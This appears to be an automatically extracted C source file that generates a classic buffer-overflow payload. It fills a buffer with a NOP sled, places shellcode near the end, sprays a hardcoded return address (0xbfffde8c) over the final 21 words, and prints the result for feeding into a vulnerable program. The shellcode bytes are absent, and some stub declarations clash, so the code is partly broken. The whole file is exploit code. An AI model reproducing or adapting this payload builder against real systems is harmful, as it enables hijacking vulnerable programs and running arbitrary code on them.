
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef char u_char ;
typedef int ret ;


 int NOP ;
 int bufsize ;
 int memcpy (char*,int*,int) ;
 int memset (char*,int ,int) ;
 int printf (char*,char*) ;
 int* shellcode ;
 int strlen (int*) ;

int main()

{

    long offset = 0;

    int ret;

    u_char buf[bufsize];

    memset(buf, NOP, bufsize);





    memcpy(&buf[bufsize-(strlen(shellcode)+21*sizeof
(ret))],shellcode,strlen(shellcode));

    ret = 0xbfffde8c;

    memcpy(&buf[bufsize-(sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(2*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(3*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(4*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(5*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(6*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(7*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(8*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(9*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(10*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(11*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(12*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(13*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(14*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(15*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(16*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(17*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(18*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(19*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(20*sizeof(ret))], &ret, sizeof(ret));

    memcpy(&buf[bufsize-(21*sizeof(ret))], &ret, sizeof(ret));



printf("%s\n",buf);

}
